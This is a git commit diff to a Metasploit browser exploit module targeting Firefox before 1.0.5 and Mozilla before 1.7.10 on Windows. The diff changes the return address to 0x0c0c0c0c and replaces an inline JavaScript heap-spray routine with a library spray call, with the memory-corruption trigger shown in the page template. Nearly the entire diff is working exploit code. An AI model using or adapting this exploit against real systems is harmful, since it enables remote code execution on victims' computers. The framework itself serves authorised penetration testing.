fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0
git-svn-id: file:///home/svn/framework3/trunk@7865 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
c799df8559
commit
0cf566c0b9
|
@ -57,16 +57,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Firefox < 1.0.5 Windows',
|
||||
# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
|
||||
# WinXP-SP3 and Win2kAS-SP0
|
||||
[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'StackAdjustment' => -3500,
|
||||
'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],
|
||||
|
||||
'Ret' => 0x0c0c0c0c,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 13 2005'
|
||||
))
|
||||
end
|
||||
|
@ -88,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
|
||||
|
||||
spray_to = sprintf("0x%.8x", target['Addrs'][0])
|
||||
spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )
|
||||
spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )
|
||||
eax_address = sprintf("0x%.8x", target['Addrs'][3])
|
||||
spray_to = sprintf("0x%.8x", target.ret)
|
||||
spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
||||
spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
|
||||
eax_address = sprintf("0x%.8x", target.ret)
|
||||
|
||||
return %Q|
|
||||
<html>
|
||||
|
@ -110,45 +111,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
CrashAndBurn();
|
||||
};
|
||||
|
||||
#{js_heap_spray}
|
||||
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
|
||||
function CrashAndBurn()
|
||||
{
|
||||
// Spray up to this address
|
||||
var heapSprayToAddress=#{spray_to};
|
||||
|
||||
// Payload - Just return..
|
||||
var payLoadCode=unescape("#{enc_code}");
|
||||
|
||||
// Size of the heap blocks
|
||||
var heapBlockSize=0x400000;
|
||||
|
||||
// Size of the payload in bytes
|
||||
var payLoadSize=payLoadCode.length * 2;
|
||||
|
||||
// Caluclate spray slides size
|
||||
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
|
||||
|
||||
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
|
||||
var spraySlide1 = unescape("#{spray_slide1}");
|
||||
|
||||
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
|
||||
|
||||
var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C
|
||||
|
||||
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
|
||||
|
||||
var spraySlide3 = unescape("#{enc_nops}");
|
||||
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
|
||||
|
||||
// Spray the heap
|
||||
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
|
||||
//alert(spraySlide2.length); return;
|
||||
memory = new Array();
|
||||
for (i=0;i<heapBlocks;i++)
|
||||
{
|
||||
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:
|
||||
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
|
||||
}
|
||||
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
|
||||
|
||||
// Set address to fake "pdata".
|
||||
var eaxAddress = #{eax_address};
|
||||
|
@ -162,16 +134,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
//
|
||||
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
|
||||
}
|
||||
|
||||
function getSpraySlide(spraySlide, spraySlideSize) {
|
||||
while (spraySlide.length*2<spraySlideSize)
|
||||
{
|
||||
spraySlide+=spraySlide;
|
||||
}
|
||||
spraySlide=spraySlide.substring(0,spraySlideSize/2);
|
||||
return spraySlide;
|
||||
}
|
||||
|
||||
// -->
|
||||
</script>
|
||||
</head>
|
||||
|
|
Loading…
Reference in New Issue